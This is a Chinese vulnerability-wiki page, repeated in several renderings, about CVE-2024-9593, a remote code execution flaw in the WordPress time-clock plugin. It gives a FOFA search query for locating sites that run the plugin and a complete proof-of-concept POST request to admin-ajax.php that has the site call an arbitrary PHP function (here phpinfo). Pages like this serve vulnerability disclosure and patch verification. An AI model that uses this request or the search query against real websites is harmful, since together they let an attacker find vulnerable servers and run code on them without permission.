fofamini-wiki

登录白背景

源码

Wordpress time-clock插件存在RCE漏洞(CVE-2024-9593)

一、漏洞简介

WordPress是一款免费开源的内容管理系统(CMS)，最初是一个博客平台，但后来发展成为一个功能强大的网站建设工具，适用于各种类型的网站，包括个人博客、企业网站、电子商务网站等，并逐步演化成一款内容管理系统软件。Wordpress time-clock插件存在RCE漏洞

二、影响版本

Wordpress time-clock

三、资产测绘

body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"

特征

四、漏洞复现

POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

function=phpinfo

原文: https://www.yuque.com/xiaokp7/ocvun2/tqbguu6wpdbehbbf

# Wordpress time-clock插件存在RCE漏洞(CVE-2024-9593)

# 一、漏洞简介
WordPress是一款免费开源的内容管理系统(CMS)，最初是一个博客平台，但后来发展成为一个功能强大的网站建设工具，适用于各种类型的网站，包括个人博客、企业网站、电子商务网站等，并逐步演化成一款内容管理系统软件。Wordpress time-clock插件存在RCE漏洞

# 二、影响版本
+ Wordpress time-clock

# 三、资产测绘
```plain
body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
```

+ 特征

![1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec.png](./img/FaxV0Q5taJdfnNwV/1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec-543853.png)

# 四、漏洞复现
```plain
POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

function=phpinfo
```

![1730217196552-f2436a4b-8421-42c7-a855-31ba8b3733c7.png](./img/FaxV0Q5taJdfnNwV/1730217196552-f2436a4b-8421-42c7-a855-31ba8b3733c7-544679.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tqbguu6wpdbehbbf>

fofamini-wiki

Wordpress time-clock插件存在RCE漏洞(CVE-2024-9593)

<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>

<font style="color:rgb(38, 38, 38);">二、影响版本</font>

<font style="color:rgb(38, 38, 38);">三、资产测绘</font>

四、漏洞复现